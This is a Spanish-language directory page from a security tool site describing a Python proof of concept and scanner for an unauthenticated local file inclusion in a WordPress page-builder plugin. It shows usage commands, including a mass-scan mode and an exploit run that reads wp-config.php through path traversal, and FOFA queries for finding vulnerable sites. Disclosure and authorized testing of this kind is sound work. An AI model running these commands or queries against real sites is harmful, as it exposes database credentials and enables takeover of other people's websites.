Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-12227 — PoC y escáner en Python 3 para CVE-2026-12227, una inclusión de archivos locales no autenticada en WordPress Visual Composer Website Builder a través del parámetro vcv-template. | Kitploit
Herramientas/GitHubGitHub/murrez/cve-2026-12227
ReconocimientoEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmurrez/cve-2026-12227

CVE-2026-12227

PoC y escáner en Python 3 para CVE-2026-12227, una inclusión de archivos locales no autenticada en WordPress Visual Composer Website Builder a través del parámetro vcv-template.

1hace 10h 12mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
Compartir

CVE-2026-12227 — LFI no autenticado en Visual Composer Website Builder

PoC en Python 3 para CVE-2026-12227 (Wordfence): Inclusión Local de Archivos a través del parámetro de consulta vcv-template en Visual Composer Website Builder (visualcomposer en wordpress.org).

PlataformaPlugin de WordPress
ComponenteVisual Composer Website Builder
Afectado≤ 45.16.0
Corregido en> 45.16.0 (WP Trac 3619572) — usar la última versión estable (p. ej. 45.16.3+)
CVSS9.8 Crítico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
AutenticaciónNo autenticado
CWECWE-98
NoWPBakery (js_composer) ni SAP NetWeaver Visual Composer

Resumen

En las versiones vulnerables, las cargas de páginas públicas respetan el parámetro vcv-template controlado por el atacante (junto con vcv-template-type) durante el manejo de template_include de WordPress dentro de PageTemplatesController. Esto puede incluir archivos elegidos por el atacante en el disco; los archivos PHP pueden ejecutarse (RCE). Wordfence señala cadenas con extensiones "seguras" subidas en algunas configuraciones.

Superficie de ataque

  • Requiere el plugin instalado y una página de front-end construida con VC (permalink normal).
  • La sonda añade parámetros de consulta, p. ej. ?vcv-template-type=vc&vcv-template=blank o rutas LFI bajo vcv-template.
  • Parámetros relacionados: vcv-template-type, vcv-template-stretched.

Requisitos

root@kitploit:~
pip install -r requirements.txt

Python 3.8+.

Uso

root@kitploit:~
# Version + plugin + VC page crawl + template/LFI probes
python poc.py -u https://target.example --mode check

# Known VC landing page
python poc.py -u https://target.example --mode check --page-url /

# Mass scan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet

# Custom include path (authorized testing only)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php

# JSON for scripting
python poc.py -u https://target.example --mode check --json

Salida

ArchivoSignificado
cve_2026_12227_results.jsonlJSON completo por objetivo

Valores de estado

Indicaciones para FOFA

root@kitploit:~
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"

Notas técnicas

  • Ruta del código: visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate).
  • Check trata el control del parámetro o los marcadores LFI como exploitable_candidate; confirmar en un clon de staging antes de asumir RCE.
  • Los addons premium TemplateFilter / theme-builder pueden ampliar las rutas alcanzables en algunos sitios.

Legal

Usar solo en sistemas que posea o para los que tenga permiso explícito de prueba.

Descargar herramienta
hits.txtNombres de host candidatos
candidates.jsonlResumen del modo check (page_url, status, lfi)
EstadoSignificado
lfi_confirmedLa respuesta coincide con las heurísticas de wp-config / /etc/passwd / version.php
vcv_template_controllablevcv-template=blank cambia el diseño respecto a la línea base (parámetro vulnerable respetado)
plugin_vuln_no_surfaceVersión antigua del plugin pero sin página VC o parámetro ignorado
no_vc_pagePlugin presente, sin marcadores VC en las rutas rastreadas
patchedVersión > 45.16.0